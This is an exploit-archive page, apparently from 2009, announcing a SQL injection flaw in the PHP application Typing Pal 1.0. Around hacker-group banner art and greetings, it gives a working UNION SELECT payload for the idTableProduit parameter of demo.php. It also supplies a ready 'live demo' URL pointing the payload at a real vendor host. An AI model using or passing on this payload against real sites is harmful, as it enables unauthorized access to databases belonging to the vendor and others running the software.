[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Typing Pal <= 1.0 (idTableProduit) SQL Injection Vulnerability
# Published : 2009-08-07
# Author : Red-D3v1L
# Previous Title : Logoshows BBS 2.0 (forumid) Remote SQL Injection Vulnerability
# Next Title : Arab Portal 2.2 (Auth Bypass) Blind SQL Injection Exploit


==============================================================================
                      _      _       _          _      _   _
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                        

==============================================================================
        [??] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [??] Typing Pal <= 1.0 Remote SQL injection Vulnerability
==============================================================================
    [??] my home:            [ Hackteach.org ]
    [??] Script:             [ Typing Pal ]
    [??] Language:           [ PHP ]
    [??] home:               [ http://www.demarque.qc.ca/download_demo/popupDownload.asp?noProduit=63&langue=1 ]
    [??] Founder:            [ Red-D3v1L < php-c0de@hotmail.com > ]
    [??] Gr44tz to:          [ All member Hackteach.org/cc ]

###########################################################################



===[ Exploit SQL  ]===  
  
    [??] {PAHT}/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
    [??] l1v3 d3m0 : http://education.demarque.com/demo.php?idTableProduit=-63+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20--
 

Author: Red-D3v1L <-

###########################################################################

# www.Syue.com [2009-08-07]